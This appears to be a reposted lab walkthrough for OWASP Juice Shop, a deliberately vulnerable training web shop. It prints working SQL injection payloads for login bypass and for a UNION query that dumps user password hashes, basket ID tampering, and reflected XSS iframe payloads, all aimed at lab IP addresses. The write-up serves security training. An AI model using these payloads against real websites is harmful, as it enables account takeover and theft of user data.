OWASP Juice Shop网站入侵实列(网站经典入侵)-泓源视野

OWASP Juice Shop网站入侵实列(网站经典入侵)

[Task 1] Connect To Our Network

[Task 2] Configure Burp (If you haven’t already)

[Task 3] Walk through the application
1. create an account
2. click on the links you can see what the application does(and to identify an attack surface i.e. what parts of the application have functionality that you can attack)
3. use the different functionality(e.g. making transactions)

Steps:
1. Discover web application’s functionality to find the attack surface.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图

2. View page’s source

OWASP Juice Shop网站入侵实列(网站经典入侵)插图1
There’s a youtube link.

3. Follow youtube link → nothing just for fun. lol

OWASP Juice Shop网站入侵实列(网站经典入侵)插图2

4. Create account

5. Click “Not yet a customer?”

OWASP Juice Shop网站入侵实列(网站经典入侵)插图3

6. User Registration
→ Email: [email protected]
→ Password: 12345
→ Answer to question: 12345

OWASP Juice Shop网站入侵实列(网站经典入侵)插图4

7. Try to login with created account → SQL injection

OWASP Juice Shop网站入侵实列(网站经典入侵)插图5

8. Try changing password

OWASP Juice Shop网站入侵实列(网站经典入侵)插图6

9. Enter required data → It’s very easy to change a password.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图7

10. Try to buy something and checkout

OWASP Juice Shop网站入侵实列(网站经典入侵)插图8

11. There’s ftp path.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图9

12. Follow the ftp path → File inclusion

OWASP Juice Shop网站入侵实列(网站经典入侵)插图10

5. About us
Click on the green text.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图11

6. There’a “legal.md” file which is located in the ftp path.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图12

6. Contact us
Click on “Complain?”

OWASP Juice Shop网站入侵实列(网站经典入侵)插图13

7. Try upload some text files. It seems like only PDF file is allowed.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图14

8. Upload test.pdf

OWASP Juice Shop网站入侵实列(网站经典入侵)插图15

9. Successfully upload → file inclusion

OWASP Juice Shop网站入侵实列(网站经典入侵)插图16

Conclusion:

The things I discovered so far:
1. The site was developed using Javascript.
2. SQL Injection
3. Password is easily changed
4. Exposure of data
5. File inclusion


[Task 4] Injection
Log in with the administrator's user account using SQL Injection

  1. Try to inject login page
OWASP Juice Shop网站入侵实列(网站经典入侵)插图17

2. Try SQL injection

username '
password test
OWASP Juice Shop网站入侵实列(网站经典入侵)插图18
username ' or 1=1
password test
OWASP Juice Shop网站入侵实列(网站经典入侵)插图19
username ' or 1=1--
password test

Success!!!

OWASP Juice Shop网站入侵实列(网站经典入侵)插图20

It seems like we logged in with admin account

OWASP Juice Shop网站入侵实列(网站经典入侵)插图21

Admin email is [email protected]


[Task 5] Broken Authentication

  • Reset Jim’s password using the forgotten password mechanism — what was the answer to the secret question?
  • What is the administrator password?
  1. We need to find Jim’s credential.
  2. I noticed there is search function, but this function cannot be injected.
OWASP Juice Shop网站入侵实列(网站经典入侵)插图22

3. After inspect with browser’s network function and reload the request → http://10.10.112.196/rest/product/search?q=

OWASP Juice Shop网站入侵实列(网站经典入侵)插图23

4. Injection
Using '))-- attack pattern with “union”

http://10.10.112.196/rest/product/search?q='
OWASP Juice Shop网站入侵实列(网站经典入侵)插图24
http://10.10.112.196/rest/product/search?q='))--
OWASP Juice Shop网站入侵实列(网站经典入侵)插图25
http://10.10.112.196/rest/product/search?q=')) union select * from x--
OWASP Juice Shop网站入侵实列(网站经典入侵)插图26

Try to find correct column

http://10.10.112.196/rest/product/search?q=lalaland')) union select 1http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2 http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3 http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6 http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,7 http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,7,8 

Success!!

OWASP Juice Shop网站入侵实列(网站经典入侵)插图27

5. Enumerate the database

http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,7,sqlite_version()--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,8 from sqlite_master-- --> not workshttp://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,email,password from Users--

Now, we have every account hash.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图28

Crack admin’s password with CrackStation (https://crackstation.net/)

OWASP Juice Shop网站入侵实列(网站经典入侵)插图29

The result of admin’s password is admin123

OWASP Juice Shop网站入侵实列(网站经典入侵)插图30

6. I still can’t reset Jim’ password. Let’s try the other way.

7. View the site with Chrome’s sources function

OWASP Juice Shop网站入侵实列(网站经典入侵)插图31

8. Inspect main.js and search “admin”

OWASP Juice Shop网站入侵实列(网站经典入侵)插图32

9. Try http://10.10.112.196/#/administration

OWASP Juice Shop网站入侵实列(网站经典入侵)插图33

There’s recycling request related to

OWASP Juice Shop网站入侵实列(网站经典入侵)插图34

10. Try to reset Jim’s password

OWASP Juice Shop网站入侵实列(网站经典入侵)插图35
OWASP Juice Shop网站入侵实列(网站经典入侵)插图36

11. Jim stays at “Starfleet HQ, 24–593 Federation Drive, San Francisco, CA” → May be a hint of Star Trek

12. Let’s try with Star Trek character’s name. Start with searching James T. Kirk and access wikipedia site.

OWASP Juice Shop网站入侵实列(网站经典入侵)插图37

13. Try reset with “Tiberius” or “tiberius” → failed

14. Try reset with “Samuel”

OWASP Juice Shop网站入侵实列(网站经典入侵)插图38
OWASP Juice Shop网站入侵实列(网站经典入侵)插图39

[Task 6] Sensitive Data Exposure

  • Access a confidential document and enter the name of the first file with the extension “.md”
  1. access http://10.10.230.0/ftp/
  2. Download and open “acquisitions.md”
OWASP Juice Shop网站入侵实列(网站经典入侵)插图40
OWASP Juice Shop网站入侵实列(网站经典入侵)插图41
OWASP Juice Shop网站入侵实列(网站经典入侵)插图42

[Task 7] Broken Access Control

  • Access the administration section of the store — What is the name of the page?
  • Access someone else’s basket
  • Get rid of all 5 star customer feedback
  1. I already access admistration page
OWASP Juice Shop网站入侵实列(网站经典入侵)插图33
OWASP Juice Shop网站入侵实列(网站经典入侵)插图43

2. Access basket page

3. Inspect with Chrome’s application function

4. In session storage, edit bid

OWASP Juice Shop网站入侵实列(网站经典入侵)插图44

5. reload the page

OWASP Juice Shop网站入侵实列(网站经典入侵)插图45

6. Back to administration page, delete 5-star feedback

OWASP Juice Shop网站入侵实列(网站经典入侵)插图46

[Task 8] Cross Site Scripting(XSS)

  • Carry out reflected XSS using Tracking Orders
  • Carry out XSS using the Search field?
  1. Go into Track Orders
OWASP Juice Shop网站入侵实列(网站经典入侵)插图47
OWASP Juice Shop网站入侵实列(网站经典入侵)插图48

2. Try to put some numbers

OWASP Juice Shop网站入侵实列(网站经典入侵)插图49

3. Put “<iframe src=”javascript:alert(‘xss’)”> in the request

http://10.10.52.41/#/track-result?id=<iframe src="javascript:alert('xss')">
OWASP Juice Shop网站入侵实列(网站经典入侵)插图50

4. Put “<iframe src=”javascript:alert(‘xss’)”>” in search function

http://10.10.52.41/#/search?q=<iframe src="javascript:alert('xss')">
OWASP Juice Shop网站入侵实列(网站经典入侵)插图51
OWASP Juice Shop网站入侵实列(网站经典入侵)插图52

经典web入侵案例

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
23

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8235586 位访客, 您的IP是:[18.234.139.149]